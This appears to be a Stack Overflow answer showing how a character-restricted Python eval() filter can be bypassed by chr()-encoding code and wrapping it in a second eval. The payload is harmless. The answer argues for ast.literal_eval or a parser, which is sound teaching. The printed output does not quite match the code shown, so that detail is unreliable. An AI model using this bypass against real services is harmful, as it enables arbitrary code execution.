There are many questions on SO about using Python\'s eval on insecure strings (eg.: Security of Python\'s eval() on untrusted strings?, Python: make eval safe).
Here you have a working "exploit" with your restrictions in place - only contains lower case ascii chars or any of the signs +-*/() . It relies on a 2nd eval layer.
def mask_code( python_code ):
s="+".join(["chr("+str(ord(i))+")" for i in python_code])
return "eval("+s+")"
bad_code='''__import__("os").getcwd()'''
masked= mask_code( bad_code )
print masked
print eval(bad_code)
output:
eval(chr(111)+chr(115)+chr(46)+chr(103)+chr(101)+chr(116)+chr(99)+chr(119)+chr(100)+chr(40)+chr(41))
/home/user
This is a very trivial "exploit". I'm sure there's countless others, even with further character restrictions. It bears repeating that one should always use a parser or ast.literal_eval(). Only by parsing the tokens can one be sure the string is safe to evaluate. Anything else is betting against the house.